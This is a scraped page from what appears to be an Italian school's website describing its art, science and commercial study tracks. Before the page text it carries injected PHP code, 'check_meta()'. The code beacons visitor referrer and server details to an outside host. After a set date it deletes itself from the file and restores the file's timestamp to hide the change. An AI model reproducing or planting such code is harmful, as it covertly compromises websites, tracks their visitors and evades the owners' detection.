check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735873){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } INDIRIZZI DI STUDIO
Get Adobe Flash player

Nuovo sito

nuovosito 1

INDIRIZZI DI STUDIO

  • Liceo Artistico
    Il Liceo Artistico si propone lo scopo di unire ad una formazione liceale che tradizionalmente fornisce allo studente gli strumenti culturali e metodologici  per una comprensione approfondita della realtà, lo sviluppo delle potenzialità creative e l’acquisizione delle competenze necessarie per dare espressione alla propria capacità progettuale, anche attraverso l’uso delle nuove tecnologie informatiche. Il corso fornisce una preparazione adeguata sia al proseguimento degli studi di ordine superiore, sia all’inserimento nella vita sociale e nel mondo del lavoro.
    
    mafai_1small
    mafai_2small
  • Liceo Scientifico

    Il liceo scientifico tradizionale, con il potenziamento della matematica e delle discipline di indirizzo,garantisce una accurata preparazione scientifica. La presenza del latino offre inoltre una formazione ricca e completa, di ampio respiro culturale,dove la contrapposizione tra sapere scientifico e umanistico viene superata in un assetto armonioso ed organico che si avvale anche dell'intensa attività di laboratorio. Il Liceo scientifico tradizionale garantisce un livello di preparazione e un metodo di lavoro adeguati per affrontarecon tranquillità ogni corso di studi universitari o eventuali prove concorsuali.

    
    alpi_1small
    alpi_2small
  • Tecnico Commerciale

     indirizzo:   Amministrazione - Finanza e Marketing

    L'Istituto Tecnico indirizzo Amministrazione, Finanza e Marketing", oltre a fornire una buona cultura generale, integra le competenze  dell'ambito professionale con quelle linguistiche e informatiche. Ciò permette di operare nel sistema informativo dell'azienda e di contribuire  all'innovazione e al rinnovamento organizzativo e tecnologico dell'impresa, inserita nel contesto internazionale. Nell’articolazione “Sistemi  informativi  aziendali”, il profilo si caratterizza per il riferimento all’ambito della gestione del sistema informativo aziendale e alla valutazione, alla scelta e all’adattamento di software applicativi. Il diploma consente l'immediato inserimento nel mondo del lavoro e offre una buona preparazione  in vista della prosecuzione degli studi universitari.

    
    alpi_1small
    alpi_2small
  • Classi
    CLASSI anno scolastico 2014/2015
  • Attività